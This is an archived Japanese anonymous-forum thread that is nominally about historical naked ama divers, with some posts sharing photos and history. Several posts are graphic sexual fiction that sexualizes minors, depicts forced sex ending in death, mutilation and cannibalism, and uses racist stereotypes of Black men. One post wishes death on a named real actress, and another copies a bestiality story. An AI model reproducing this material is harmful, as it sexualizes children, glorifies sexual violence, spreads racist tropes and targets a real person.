 ]醴雛翩孤調IIjji,(i:;、.、...    、....:、;;゙(i浴朋翩回Il゙(.(.(iI||調醴′
  層靈翩瓰||||||||后lI,ii,(,(.(.(.(.(.(,(,(3浴|||||||||}|}}}|||I3.(.(}I}}朋醴.
  濁醴雛瓰|||||}}}}}}}}}}}}II}l}ヌl{(l}ヌl}ヌ浴}}}}l{(浴III||||I;(.(浴}|||讃〉 .
  、゙[醴醴雛胞||II浴l.[(.(.(.(.('゙'.''゙':''゙(i.(.(.(`:‘(.(.(}II|||||II,(i.[(I|||讃]
    層醴雛翩瓰IIIIl.[(.(.(.(>.'.、:、':.'.、.'.、.'.、:: (.(,(III|屈||IIIII|朋醴$ .
    濁醴靈翩翩回IIIi,(.(.(>.'.、.'.、:、::.'.、.'.、.(.(洽I|||讃蹤||||調醴† .


278 :天之御名無主:2006/11/18(土) 12:41:22
夏休みデビュー中の女子高生全裸海女(17歳)のぱっくり割れた桃色のオマンコ(憧れの先輩との性交で昨年夏に1回使用済)に叩き込む黒衣の旅人の非情のペニス!

とここまで書いたら勃起して荒ぶる我が卑情のペニス!



























擦ってきます。

279 :天之御名無主:2006/11/21(火) 08:05:05
潤子の膣にぶち込む非情のペニス。
身長は153cmと小柄、ロリ顔ながらもスタイルのいい女だ。
子宮を衝く度に泣き叫んでいた此奴も今ではすっぽりと子宮口にペニスを受け容れて実にいい声で鳴く女に成長した。

280 :天之御名無主:2006/11/22(水) 00:37:05
何のスレだ?

281 :天之御名無主:2006/11/24(金) 20:01:07
エロネタ専用スレ

282 :天之御名無主:2006/12/01(金) 15:09:30
昔のカメラ雑誌に雪の降る中で、ふんどし一丁の裸海女が行列して歩いてて、物凄く
着膨れた客引きのおばさんが脇で叫んでる写真が載ってた、お客が海に投げる小銭
を厳寒の冬の海に飛び込んで取って来る見世物だと解説にある、昭和九年らしい

283 :天之御名無主:2006/12/01(金) 22:54:19
>>282
舳倉島は冬は無人でしたから、隣の福井県の東尋坊かもしれませんね。

284 :天之御名無主:2006/12/02(土) 11:56:54
>>282

何か悲惨な芸だな…
この分だと裸海女は本当に客取ってそう。

股間からも磯の香りが…プーン

285 :天之御名無主:2006/12/08(金) 12:55:06
ジェローム神父が紛れ込んでるヌレはここでつか?

286 :天之御名無主:2006/12/09(土) 09:19:25
ttp://navy2.gazo-ch.net/bbs/7/img/200612/1122192.jpg
裸海女

287 :天之御名無主:2006/12/10(日) 01:16:09
よくわからんが見れないそうだ

288 :天之御名無主:2006/12/10(日) 19:00:52
彼氏の借金のカタに騙されてAV出演を強要された沢沼潤子21歳.
T153、B86(69F)-W55-H81、漆黒の髪、白い肌の扇情.
実は潤子は裸海女の末裔で膣から子宮まで一直線というキワモノボディの持ち主だったのだ.
彼氏の直径3.5cm長さ21cmを根本までずっぽり挿入された潤子.
充血した子宮口が開き、亀頭が子宮に入ると鳴き声を挙げ目を見開いたままのけぞり失神、ぴくぴくと痙攣する.
彼女の意志とは無関係に反応する性交マシーン.
彼氏が友人に語った自慢話を伝え聞いたそ債権者はめざとく潤子に眼を付けた.
男優は何とボビーオロゴン似の黒人.
ペニスは直径7cm長さ32cmでしかも黒人でありながら鋼鉄のように堅かった.
小柄ながら整った容姿の潤子を一目見て荒ぶる黒人.
嫌がる潤子を押さえつけて勢いを付けてその巨根を根本まで押し込んだ.
潤子の中で何かが弾けた.
マシーンに化した潤子の膣口、黒く太いモノが激しく出入りする隙間から大量の赤い液体が流れ出した.
黒人は構うことなくピストンし続けている。
黒人が子宮内射精を成し遂げ、ペニスを抜き取ると血が噴き出した。

やがて潤子は出血多量で死亡した.
黒人に攻められた時の卑猥な姿そのままに.

このビデオには大股開きで硬直したまま、腹を割かれ、真っ二つに裂けた膣と子宮を露わにした潤子の死体が鮮明に写っている.
そして黒人が潤子の臓器を生のままむしゃむしゃと貪る姿も.

世界中のVIPは誰もがこの残虐かつ甘美なムービーを所有しているという.


289 :天之御名無主:2006/12/10(日) 19:06:46
裸海女の末裔って・・・全然関係ないだろ
エロSS書きたいならよそに逝け

290 :天之御名無主:2006/12/10(日) 21:03:02
ttp://navy2.gazo-ch.net/bbs/7/img/200612/1125067.jpg
実際の裸海女に話題を戻しましょうよ。

291 :天之御名無主:2006/12/10(日) 21:10:25
見て欲しいなら見れるようにリンク貼れ

292 :天之御名無主:2006/12/10(日) 21:46:09
>>288
>そして黒人が潤子の臓器を生のままむしゃむしゃと貪る姿も.
ここで噴いた。
お前は黒人を一体何だと思ってるんだ(藁

293 :天之御名無主:2006/12/12(火) 01:11:01
潤子の破瓜は芸術的だった。
性技に長けた青年KYにより、苦痛の表情、声を発する間もなく円滑に子宮まで貫かれて全身を大きく仰け反らせて失神。
その間に内部に白濁を注がれた。
陰茎を抜き取られたまま大きく開かれた両脚の間の未だ桃色の膣口からそれに比べてやや色素の沈着した肛門にかけての仄かに紅を差した白い肌に流れる赤い破瓜の血と僅かだが確実に存在する白濁が流れ出している。
目を開いたまま首を右を向いて失神している潤子のたおやかな黒髪は乱れ、その白い顔を隠している。
今なお潤子の全身はまだかすかに痙攣し、乳首も陰核も勃っていた。

最も美しく、最も卑猥な16歳の作品が厳然としてそこにあった。

黒人に殺害されるまでの5年間に潤子の膣と子宮を貫いた男達は数多い。
しかし、潤子は常に美しい性交マシーンであった。

294 :天之御名無主:2006/12/12(火) 01:31:08
浜相撲の情報もっとあったら、よろしくおねがいしますm(_ _)m

295 :天之御名無主:2006/12/16(土) 12:49:04
黒人にコンプレックスを抱いてるストーカーがいるようだな。

296 :天之御名無主:2006/12/16(土) 13:33:20
       lliiiiii,,,、                         ,,,iiiii,,,、  ,liiiiiiiiiii,,,、
       .lllllllllli                       lllllll゙゙lllll   `゙゙!!llllllli、    ,,,
      : ,illllllllll゙               : lliiiiiiii,,, 'liiii,,,, ゙゙゙!!ll!!!゙′    .゙゙゙゙゙`   ,,iill!゜
      .,llllllllll゙          _,,,,,,,,    ,llllllllll!  ゙゙llllllli,,            .,,,illlll!°
     ,illlllllll°  '!llliiiiiiiiiiiiiilllllllllllllllll    llllllllll゙`  .゙!lllllllii,,、        ,,,,illllllll!゙
    ,,illlllllll°    ゙゙!!!!!!!!゙゙゙゙゙”″    ,,llllllll!°    '!llllllllll、  __   _,,,iillllllllll!゙′
   ,,illllllll!゙`                  ,,,iilllllll!゙゜      .゙!llllllll、  .゙llliiiiilllllllllllll!゙゙゜
 .,,,,illllllll!゙°               : ゙゙゙゙゙゙°        '゙!!!!゙   .゙゙!lllllllllll!!゙°
: '゙!!!!!゙゙°                                     ゙゙゙゙゙゙゛


297 :天之御名無主:2006/12/20(水) 15:53:00
>>288

21cmというのは日本人としては平均の1.5倍。
薬か手術ででかくしなければ不可能なスペック。
日本一デカマラとされるマグナム北斗氏でも公称24cm。
(実際は20cm以下だと思う:モザイク様々)

黒人の男優も公称30cm、実際24cm位。
薬か手術ででかくしてるのは日本人同様。

小柄な女にデカマラぶち込み苦悶させたい願望は万国共通。
特に日本人と朝鮮人(韓国人)は人気がある。
中国人、特に大陸の連中は顔が大味だから次点。

298 :天之御名無主:2006/12/20(水) 15:56:50
膣や子宮が裂ける前に黒人の陰茎がいかれるはずだが…
但し、外人用の大人のオモチャ(長さ40cmのバイブとか実在する)で突き破る可能性は結構高い。

個人的には川島和●美に40cmを突っ込んで死に至らしめたい。
(悶え声がバカで萎えるというかムカツクから)

299 :天之御名無主:2006/12/20(水) 22:15:36
チェ・ジウは別にヌードどころか水着にすらなってないし巨乳でもないが性欲そそる。
日本人のタレントにあそこまで交合願望をそそる奴はいない。彼女の顔だけで抜ける。
彼女に人気があるのはよくわかる。
男の韓流タレントに人気があるはよく分からないが。

300 :天之御名無主:2006/12/21(木) 23:28:06
こういうのの話をしないか?

ttp://marron.gazo-ch.net/bbs/11/img/200404/49234.jpg
ttp://marron.gazo-ch.net/bbs/11/img/200607/859061.jpg
ttp://marron.gazo-ch.net/bbs/11/img/200612/1129881.jpg
ttp://marron.gazo-ch.net/bbs/11/img/200612/1129893.jpg
ttp://marron.gazo-ch.net/bbs/11/img/200612/1129903.jpg



301 :300:2006/12/21(木) 23:30:15
悪い、↑貼れてないっぽい

http://marron.gazo-ch.net/bbs/11/img/200404/49234.jpg
http://marron.gazo-ch.net/bbs/11/img/200607/859061.jpg
http://marron.gazo-ch.net/bbs/11/img/200612/1129881.jpg
http://marron.gazo-ch.net/bbs/11/img/200612/1129893.jpg
http://marron.gazo-ch.net/bbs/11/img/200612/1129903.jpg


302 :天之御名無主:2006/12/22(金) 21:54:09
2枚目が舳倉島で、それ以外は千葉の御宿ですね。

303 :天之御名無主:2006/12/22(金) 22:53:29
遅かった
not found

304 :天之御名無主:2006/12/23(土) 01:21:54
いや、見えるが?
二枚目の写真は驚愕。目の前でこんな姿をされたら気絶しそう。

305 :天之御名無主:2006/12/23(土) 01:32:17
not found
どうでもいい

306 :天之御名無主:2006/12/23(土) 07:10:44
http://www.fundoshi-bikini.net/nihon-fundoshi/amafun/amafun-38.jpg

307 :天之御名無主:2006/12/23(土) 07:31:00
つーかさぁ、アフリカとか例外にして、裸体が禁非になったのって、
日本国ではいつからなのさー?

308 :天之御名無主:2006/12/23(土) 07:48:51
>>307
306の人たちは1966年からウェットスーツです。
他の地方でも、ほぼ同じ時期からトップレスは見られなくなりましたね。

309 :天之御名無主:2007/01/11(木) 16:48:47
川島和津美って動画だと何であんなに馬鹿っぽいの?

310 :天之御名無主:2007/01/12(金) 22:25:54
ttp://marron.gazo-ch.net/bbs/11/img/200612/1128324.jpg

311 :天之御名無主:2007/01/13(土) 16:00:44
弟の借金のカタに騙されてAV出演を強要された栗原英美19歳.
T163の長身、B88(70F)-W55-H84、天然の栗毛の髪、血色が透けて見える白い肌の扇情.
実は英美は日本海側の裸海女の末裔でしかも膣から子宮まで一直線というキワモノボディの持ち主だったのだ.
恋人の直径3.5cm長さ17cmを根本までずっぽり挿入された英美.
充血した子宮口が開き、亀頭が子宮に入ると鳴き声を挙げ目を見開いたままのけぞり失神、ぴくぴくと痙攣する.
彼女の意志とは無関係に反応する性交マシーン.
彼氏が友人に語った自慢話を伝え聞いたそ債権者はめざとく英美に眼を付けた.
男優は何とボビーオロゴン似の黒人.
ペニスは直径7cm長さ32cmでしかも黒人でありながら鋼鉄のように堅かった.
小柄ながら整った容姿、そして何よりも色白の英美を一目見て荒ぶる黒人.
嫌がる英美を押さえつけて勢いを付けてその巨根を根本まで押し込んだ.
英美の中で何かが弾けた.
マシーンに化した英美の膣口、黒く太いモノが激しく出入りする隙間から大量の赤い液体が流れ出した.
黒人は構うことなくピストンし続けている。
黒人が子宮内射精を成し遂げ、ペニスを抜き取ると血が噴き出した。

やがて英美は出血多量で死亡した.
黒人に攻められた時の卑猥な姿そのままに.

このビデオには大股開きで硬直したまま、腹を割かれ、真っ二つに裂けた膣と子宮を露わにした英美の死体が鮮明に写っている.
そして黒人が英美の臓器を生のままむしゃむしゃと貪る姿も.

世界中のVIPは誰もがこの残虐かつ甘美なムービーを所有しているという.

312 :天之御名無主:2007/01/15(月) 21:18:07
ttp://www.fundoshi-bikini.net/nihon-fundoshi/amafun/amafundoshi.htm
写真が追加されていました。

313 :天之御名無主:2007/01/16(火) 16:48:52
>>312
情報サンクス!

314 :天之御名無主:2007/01/16(火) 17:02:28
再び、旅人来る!

黒いマントの下にはギンギンに勃起した逸物が隠されている!

若い最下層の全裸海女をポルチオ直撃ファックで殺す意欲満々!

http://blog85.fc2.com/g/gazou07/file/070117jb-ani006.jpg

315 :車板にも出入りしてるだろ>変態野郎:2007/01/20(土) 19:46:35
91 名前:名無しさん@そうだドライブへ行こう メェル:sage 投稿日:2007/01/19(金) 21:27:24 ID:dG1u5zV30
http://x51.org/x/05/07/1605.php

>参考写真はマニア向けの馬並みディルド、"トール"。長さ凡そ60cm。

19歳女子大生(男性経験3人14回)を襲う長さ60cmの衝撃!
一気に子宮まで貫かれた女はその美乳を突き出して仰け反り、やがて息絶えた。
http://sylphys.ddo.jp/upld2nd/niji7/src/1169209414667.jpg
馬の陰茎が引き抜かれた時、そこには血まみれの腸管がへばりついていたという。
まさに死に至る壮絶な交わりであった。(あ、書いてて勃起してきた…)

・・・・それはともかくこのコラムに萌えた。

昔あるところに、馬との交接にこのうえない快楽を覚えるひとりの非常に好色な女
がいた。しかし、馬の一物は太くて長い。そこでやむなく、次のような予防策を講
じることにした。三味線の弦の一端を馬の陰茎の付け根に、もう片方の端を天井に
くくり付けると、おもむろに長椅子を取り出し、それに這いのぼって馬と交接した
のである。馬は見るからに満足げな様子だったが、三味線の弦に阻まれ、女のなか
に性器を丸ごと挿入したいという願いはかなわなかった。さてさて、このことを夫
がかぎつけたからたまらない。ある晩、天井に忍び込み、一部始終をこっそろのぞ
き見した夫は、うわさどおりの妻の放蕩ぶりを目撃する。夫はここぞというときを
ひそかに待ち受け、両者が恍惚の極致に達した瞬間、弦を刀でばっさりと切り落と
した。とたんに、馬の一物に胸まで突かれ、妻はあっけなく事切れてしまった。

316 :天之御名無主:2007/01/28(日) 05:22:31
ネタがないので作ってみた

http://puka-world.com/php/upload/puka/img-box/1169929197797.jpg

317 :天之御名無主:2007/01/28(日) 09:14:23
>>316
GJ!
地域によってはこういう風景もあったんだろうね。

318 :天之御名無主:2007/01/28(日) 18:37:47
新しいふんどし海女の写真が追加されていた。

http://www.fundoshi-bikini.net/nihon-fundoshi/amafun/amafundoshi.htm

ついでに、>>316はこのページの写真の修整(ふんどし消し)と思われ。

319 :天之御名無主:2007/01/28(日) 19:23:02
>>318
情報サンクス。新しく入った89番の写真、迫力あるね。
純粋に写真として見ても海女の逞しさが伝わってきて良い感じ。

tp://www.fundoshi-bikini.net/nihon-fundoshi/amafun/amafun(89).jpg





320 :316:2007/01/28(日) 20:30:43
>>318
情報d いっちゃん最後のはわからんが、
後の3つは中村由信の写真集やね。いい躯。

ヒマだったんで作った>>316みたいな写真が何点かあるけど、いる?
スレ違い?

321 :天之御名無主:2007/01/28(日) 21:47:45
>>320
欲しいッス

322 :天之御名無主:2007/01/28(日) 22:43:01
舳倉島では1966年から全員ウェットスーツです。
他の地方でも、ほぼ同じ時期からトップレスは見られなくなりましたね。

323 :天之御名無主:2007/01/28(日) 22:46:20
>>317
舳倉島では1966年から全員ウェットスーツです。
他の地方でも、ほぼ同じ時期からトップレスは見られなくなりましたね。
>>320
自分も見たいです。

324 :316:2007/01/28(日) 23:10:44
ほんじゃあ。

http://puka-world.com/php/upload/puka/img-box/1169992873748.jpg
http://puka-world.com/php/upload/puka/img-box/1169992892203.jpg
http://puka-world.com/php/upload/puka/img-box/1169992935485.jpg
http://puka-world.com/php/upload/puka/img-box/1169992951332.jpg

まあヒマ潰しの仕事やからええ出来とは言えんので、
想像力も駆使してねw。

325 :天之御名無主:2007/01/28(日) 23:17:22
>>324
ありがとう。頂いたぜ

326 :323:2007/01/29(月) 21:02:39
>>324
良くできてますね。
1枚目なんか、タライが小さかったら露天風呂かと思ってしまいそう。

327 :天之御名無主:2007/01/30(火) 22:18:01
          ____   
       / \  /\ キリッ
.     / (ー)  (ー)\      
    /   ⌒(__人__)⌒ \    < 19歳女子大生(男性経験3人14回)を襲う長さ60cmの衝撃!
    |      |r┬-|    |       一気に子宮まで貫かれた女はその美乳を突き出して仰け反り、やがて息絶えた。
     \     `ー'´   /        馬の陰茎が引き抜かれた時、そこには血まみれの腸管がへばりついていたという。
    ノ            \ まさに死に至る壮絶な交わりであった。(あ、書いてて勃起してきた…)
  /´               ヽ              
 |    l              \
 ヽ    -一''''''" ̄ ̄``'ー--、   -一'''''''ー-、.    
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))





          ____
        /_ノ  ヽ、_\
 ミ ミ ミ  o゚((●)) ((●))゚o      ミ ミ ミ
/⌒)⌒)⌒. ::::::⌒(__人__)⌒:::\   /⌒)⌒)⌒)
| / / /     |r┬-|    | (⌒)/ / / //  < ○ ○ だっておwwwwwwwwwwwwwwwwwww
| :::::::::::(⌒)    | |  |   /  ゝ  :::::::::::/
|     ノ     | |  |   \  /  )  /
ヽ    /     `ー'´      ヽ /    /     
 |    |   l||l 从人 l||l      l||l 从人 l||l  バンバン
 ヽ    -一''''''" ̄ ̄``'ー--、   -一'''''''ー-、    
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))

328 :天之御名無主:2007/02/06(火) 20:20:58
写真見ると腰の太いおばさんばかりで全然萌えない。
このスレは文章から想像力を働かすに限る。

中学出たての若い最下層の全裸海女を捕まえてあんなことやこんなことを試みちゃう。
海中で破瓜。証拠隠滅のため海中に墓。

329 :323:2007/02/06(火) 21:51:16
http://www.fundoshi-bikini.net/nihon-fundoshi/amafun/amafun-1.jpg
http://www.fundoshi-bikini.net/nihon-fundoshi/amafun/amafun-3.jpg
この子達は十代後半だそうですよ。

330 :天之御名無主:2007/02/19(月) 05:19:48
ドイツ語サイトがあったのか。
http://www.fundoshi-bikini.net/leserbrief/kaito-1.jpg

この右側の写真は初めてだ

331 :天之御名無主:2007/02/19(月) 11:22:12
>>330
俺も知らなかったわ。情報dクス

332 :天之御名無主:2007/02/23(金) 18:43:58
海中で全裸海女を全力で追うドイツ人。

「ヘイ、ユー」

膣口に拳銃を突っ込み、容赦なく発射。
ポシュッ
威力を弱められた特製拳銃の弾だったが海女の内臓を剔り掻き回すのは十分だった。

苦悶に悶え暴れ回る海女は一旦沈んだ、凄まじい量のあぶくが視界を奪う。
しかしやがてあぶくが消えると体中の全ての孔から血を噴き出した海女の遺体が目の前をゆっくり水面へと昇っていく。
何と神々しい風景か。
ドイツ人は泣いた。

「あのこは〜のぼってゆく〜♪」

115 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)